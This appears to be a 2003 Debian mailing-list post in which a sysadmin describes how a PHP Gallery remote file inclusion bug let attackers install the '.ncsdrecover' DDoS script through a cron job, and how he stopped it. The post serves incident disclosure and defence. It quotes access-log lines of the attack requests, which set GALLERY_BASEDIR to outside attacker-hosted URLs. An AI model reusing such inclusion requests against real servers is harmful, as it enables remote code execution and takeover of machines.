I've gotten some e-mails from people who were infected with .ncsdrecover but it looks like my post is the only thing accesible via google when you find it so I thought that I would report back publicly with what I found was responsible for it and how it got removed.
Basically people told me to look in my logs and I found activity in the syslog indicating when the cron job was first added, then I searched through my apache access logs for that same time and found they were exploiting a bug in php gallery on a site that had been left up. It basically allows you to set the directory to be an external site and then you can run whatever the webserver will allow you to. In this case they upload a file to /tmp or /var/tmp as they did after I merely killed the file and removed it. Then it adds a cron job to run the file in this case .ncsdrecover hourly. If you find the access log for the same time then you might see something like this.. access.log:216.72.155.74 - - [16/Jun/2003:05:44:31 -0500] "GET /ara/page/gallery /errors/configmode.php?GALLERY_BASEDIR=http://vddos.tripod.com/ HTTP/1.0" 403 30 6 "-" "Mozilla 5.0 [en-US]" access.log:195.68.95.210 - - [17/Jun/2003:12:25:15 -0500] "GET /ara/page/gallery /errors/configmode.php?GALLERY_BASEDIR=http://ddos31337.tripod.com/ HTTP/1.0" 40 3 306 "-" "Mozilla 5.0 [en-US]" access.log:195.68.95.210 - - [17/Jun/2003:18:48:05 - It looks like they were still trying to infect me yesterday, but I had put www-data on cron.deny and thus it prevented the script from being ran. I think that a lot of people are probably falling prey to this DDOS script right now based upon e-mails I've received from people. Shouldn't the apache user be automatically denied from running cron jobs as a matter of security principle by default ? I have a question as to how safe a box is after it has been compromised by this perl script. I believe it opens up a shell account at 1337, but it shouldn't give them root access or the ability to log in as the web user at most should it ? Cuz if so that would be bad news for a lot of people who got hacked via this. Regardless I upgraded my kernel to the new version, is there anything else I should do to ensure there were no backdoors implemented by this. Also thanks for all of the initial help and responses I received. The debian community is truly a great example of mutual aid in effect. Robert Ebright sysadmin at azone.org The script is posted on the below link if anybody who knows perl wants to review it. http://archives.neohapsis.com/archives/linux/debian/2003-q2/0898.html
